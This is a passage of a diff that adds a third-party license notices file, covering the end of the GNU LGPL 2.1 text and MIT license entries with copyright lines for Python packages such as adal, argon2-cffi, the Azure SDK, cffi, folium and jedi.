+   15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE LIBRARY, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE LIBRARY "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE LIBRARY IS WITH YOU. SHOULD THE LIBRARY PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
+
+   16. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE LIBRARY AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE LIBRARY (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE LIBRARY TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. END OF TERMS AND CONDITIONS
+
+How to Apply These Terms to Your New Libraries
+
+If you develop a new library, and you want it to be of the greatest possible use to the public, we recommend making it free software that everyone can redistribute and change. You can do so by permitting redistribution under these terms (or, alternatively, under the terms of the ordinary General Public License).
+
+To apply these terms, attach the following notices to the library. It is safest to attach them to the start of each source file to most effectively convey the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found.
+
+< one line to give the library's name and an idea of what it does. >
+
+Copyright (C) < year > < name of author >
+
+This library is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version.
+
+This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details.
+
+You should have received a copy of the GNU Lesser General Public License along with this library; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA Also add information on how to contact you by electronic and paper mail.
+
+You should also get your employer (if you work as a programmer) or your school, if any, to sign a "copyright disclaimer" for the library, if necessary. Here is a sample; alter the names:
+
+Yoyodyne, Inc., hereby disclaims all copyright interest in
+
+the library `Frob' (a library for tweaking knobs) written
+
+by James Random Hacker.
+
+< signature of Ty Coon > , 1 April 1990
+
+Ty Coon, President of Vice
+
+That's all there is to it!
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+adal 1.2.7 - MIT
+
+
+Copyright (c) Microsoft Corporation.
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+argon2-cffi 21.3.0 - MIT
+
+
+Copyright (c) 2015
+copyright 2015, Hynek Schlawack
+Copyright (c) 2015 Hynek Schlawack
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+argon2-cffi-bindings 21.2.0 - MIT
+
+
+Copyright (c) 2015 Thomas Pornin
+copyright (c) 2015 Thomas Pornin
+copyright (c) Samuel Neves, 2013-2015
+Copyright (c) 2001-2015 by Michael Shell
+copyright (c) 2015 Daniel Dinu, Dmitry Khovratovich
+Copyright 2015 Daniel Dinu, Dmitry Khovratovich, Jean-Philippe Aumasson, and Samuel Neves
+Copyright (c) 1993-2000 by Gerry Murray, Silvano Balemi, Jon Dixon, Peter N'uchter, Juergen von Hagen
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+attrs 21.4.0 - MIT
+
+
+(c) N Revealed
+Hynek Schlawack copyright f'2015
+Copyright (c) 2015 Hynek Schlawack
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+azure-common 1.1.27 - MIT
+
+
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+azure-core 1.21.1 - MIT
+
+
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+azure-identity 1.7.1 - MIT
+
+
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+azure-mgmt-core 1.3.0 - MIT
+
+
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+azure-mgmt-nspkg 3.0.2 - MIT
+
+
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+azure-mgmt-subscription 2.0.0 - MIT
+
+
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+azure-nspkg 3.0.2 - MIT
+
+
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+backports.functools-lru-cache 1.6.4 - MIT
+
+
+Copyright Jason R. Coombs
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+branca 0.4.2 - MIT
+
+
+Copyright (c) 2013, Martin Journois
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+cffi 1.15.0 - MIT
+
+
+Copyright (c) 2002 Bo Thorsen
+Copyright (c) 2002 Roger Sayle
+Copyright (c) 2001 John Beniton
+Copyright (c) 1996 Red Hat, Inc.
+Copyright (c) 2002 Ranjit Mathew
+Copyright (c) 1996-2003 Red Hat, Inc.
+Copyright (c) 1996, 1998 Red Hat, Inc.
+Copyright (c) 2011, 2014 Anthony Green
+Copyright (c) 2009, 2010, 2011, 2012 ARM Ltd.
+Copyright (c) 1996-2003, 2007, 2008 Red Hat, Inc.
+Copyright (c) 1996, 1998, 1999, 2001 Red Hat, Inc.
+Copyright (c) 1996, 1998, 2001, 2002 Red Hat, Inc.
+copyright u'2012-2018, Armin Rigo, Maciej Fijalkowski
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+charset-normalizer 2.0.10 - MIT
+
+
+copyright 2019, Ahmed TAHRI
+Copyright (c) 2019 TAHRI Ahmed R.
+Copyright (c) 2019 Ahmed TAHRI Ousret
+(c) 2012 Denny Vrandecic (http://simia.net/letters/)
+Copyright (c) 2019 Ahmed TAHRI Ousret (https://github.com/Ousret).
+Copyright (c) 2019 Ahmed TAHRI Ousret (https://github.com/Ousret). This project
+(c) https://stackoverflow.com/questions/3041986/apt-command-line-interface-like-yes-no-input
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+configparser 5.2.0 - MIT
+
+
+Copyright Jason R. Coombs
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+deprecated 1.2.13 - MIT
+
+
+(c) Laurent LAPORTE
+Copyright (c) 2017 Laurent LAPORTE
+copyright 2017, Marcos CARDOSO & Laurent LAPORTE
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+entrypoints 0.3 - MIT
+
+
+copyright 2015, Thomas Kluyver
+Copyright (c) Thomas Kluyver and contributors
+Copyright (c) 2015 Thomas Kluyver and contributors
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+folium 0.12.1.post1 - MIT
+
+
+(c) 2014, Vladimir Agafonkin
+(c) http://openstreetmap.org'
+Copyright (c) 2013, Rob Story
+Copyright 2008-2016 Patrick Wied <heatmapjs@patrick-wied.at>
+Copyright (c) 2008-2016, Patrick Wied (https://www.patrick-wied.at)
+(c) http://www.openstreetmap.org/copyright' OpenStreetMap contributors
+(c) http://cartodb.com/attributions' CartoDB, CartoDB http://cartodb.com/attributions'
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+fonttools 4.28.5 - MIT
+
+
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+html5lib 1.1 - MIT
+
+
+(c) OY H-aaoY
+Copyright (c) 2006-2013 James Graham and other contributors
+Copyright (c) 2006-2013 James Graham, Geoffrey Sneddon, and other contributors
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+jedi 0.18.1 - MIT
+
+
+Copyright (c) <2013>
+Copyright (c) Maxim Kurnikov.
+Copyright (c) 2015 Jukka Lehtosalo and contributors
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
